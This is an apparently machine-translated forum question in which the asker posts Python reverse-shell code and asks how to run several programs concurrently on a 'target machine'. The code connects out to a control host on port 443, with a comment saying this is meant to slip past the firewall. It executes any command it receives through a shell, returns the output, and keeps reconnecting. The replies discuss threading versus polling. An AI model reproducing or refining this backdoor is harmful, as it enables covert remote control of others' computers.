नीचे दिया गया कोड काम करता है लेकिन हर बार जब आप कोई प्रोग्राम चलाते हैं, उदाहरण के लिए लक्ष्य मशीन पर नोटपैड, जब तक मैं प्रोग्राम छोड़ नहीं जाता तब तक प्रॉम्प्ट फंस जाता है।उपप्रोसेसर मॉड्यूल के साथ Concurrency। मैं यह कैसे कर सकता हूँ?
लक्ष्य मशीन पर एक ही समय में एकाधिक प्रोग्राम कैसे चलाएं? मुझे लगता है कि इसे थ्रेड या सबप्रोसेस मॉड्यूल के साथ हासिल किया जा सकता है, लेकिन मैं अभी भी अवधारणा का उपयोग नहीं कर सकता।
मैं यह कैसे कर सकता हूं?
import socket
import time
import subprocess #Executar comandos do SO
#criando a conexao reversa
IP = '192.168.1.33' # ip do cliente linux netcat que sera a central de comando
PORT = 443 # usamos a porta de https pra confundir o firewall : a conexao de saida nao sera bloqueada
def connect(IP,PORT):
#conectando a central de controle
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # IP/TCP
s.connect((IP,PORT))
s.send('[!] Conexao recebida\n') # msg pra ver se foi conectado
#s.close()
return s
except Exception as e:
print('Erro de conexao',e)
return None
def listen(s):
##qdo o cliente nao esta escutando, da erro na conexao e fecha!. Nao quero isso. O server tem que ficar o tempo todo tentando ate conectar!
## versao 3!!!!!!!!!!
#versao 4 usa while True
##########loop infinito para receber comandos
try:
while True:
data = s.recv(1024) # a central de controle envia tb o "Enter" que teclamos apos cada comando {\n}
#print(data)
if data[:-1] == '/exit': #tudo exceto o ultimo caractere, que eh o \n
s.close()#fechar conexao
exit(0) # 0 eh execucao normal/sem erros
else: #executar os comandos
cmd(s,data)
except:
main(s)
def cmd(s,data):
try:
proc = subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
saida = s.send(proc.stdout.read() + proc.stderr.read())
s.send(saida)
#print(proc.stdout.read())
except:
main(s)
def main(s):
if s:
s.close()
while True:
s_connected = connect(IP,PORT)
if s_connected:
listen(s_connected)
else:
print("deu erro na conexao, tentando de novo!!!")##so pra debug
time.sleep(10)
#return 0 #nao precisa
s = None
main(s)
मुझे लगता है कि आप बहु और multithreading नहीं था। थ्रेड एक प्रक्रिया के भीतर मौजूद हैं। – ElmoVanKielmo
@ElmoVanKielmo, वह subprocess.Popen का उपयोग कर रहा है, जिसे आप शुरू कर सकते हैं और थ्रेड से प्रतीक्षा कर सकते हैं। थ्रेडिंग यहां एक पूरी तरह व्यवहार्य समाधान है। –
@MadPhysicist चलो। इस मामले के लिए थ्रेडिंग? चल रही प्रक्रियाओं की एक सूची बनाना बेहतर है और उनमें से प्रत्येक को यह देखने के लिए मतदान करना है कि यह समाप्त हो गया है या नहीं। – ElmoVanKielmo